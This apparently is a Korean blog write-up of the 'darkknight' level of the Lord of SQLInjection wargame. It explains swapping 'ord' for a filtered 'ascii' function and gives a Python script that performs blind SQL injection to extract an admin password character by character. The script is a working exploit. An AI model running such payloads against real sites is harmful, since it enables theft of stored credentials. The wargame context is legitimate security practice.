12. LOS - darknight

LOS11번째문제 darknight입니다.

이전과 달라진 점들은 ascii까지 필터링이 먹었다는 것입니다.

이것 또한 구글링을 해보니  ascii -> ord로 가능하다는 사실을 습득! ㅎ 

아래는 페이로드입니다.

import requests
import string
 
num_alpha = string.digits + string.ascii_letters
password = ""
 
#find length passwd
resetURL = "http://los.eagle-jump.org/darkknight_f76e2eebfeeeec2b7699a9ae976f574d.php"
for i in range(1,20) :
    try :
        URL = resetURL
        payload = "?no=1 || ord(id) like 97 %26%26 length(pw) like "+str(i)+"%23"
        URL += payload
    #input your cookie(grin)
        cookies = dict(PHPSESSID = "dvs710ccqajrn9434hc3a00r11")
        response = requests.get(URL, cookies = cookies)
        print("[O] \n" + str(i) + ". connect success!!")
        print(response.text)
    except :
        print("[X] Error Code...OTL")
    if response.text.find ("</h2>") > 0 :
        print("passwd's length is : " + str(i) + "(grin)")
        break
 
#password LENGTH
for i in range(1, 9) :
    #ord("0") = 48 & ord("Z") = 90
    for j in num_alpha :
        URL = resetURL
        payload = "?no=1 || ord(id) like 97 %26%26 ord(mid(pw,"+ str(i) +", 1)) like "+ str(ord(j))+"%23"
        URL += payload
        #input your cookie(grin)z
        cookies = dict(PHPSESSID = "dvs710ccqajrn9434hc3a00r11")
        response = requests.get(URL, cookies = cookies)
 
        if response.text.find ("</h2>") > 0 :
            password += chr(ord(j))
            print (str(i) + "'s password is : " + chr(ord(j)))
            break
 
#when you find password? exploit!!
print(password)
URL = resetURL
payload = "?pw=" + password
URL += payload
#input your cookie(grin)
cookies = dict(PHPSESSID = "dvs710ccqajrn9434hc3a00r11")
response = requests.get(URL, cookies = cookies)
print (response.text)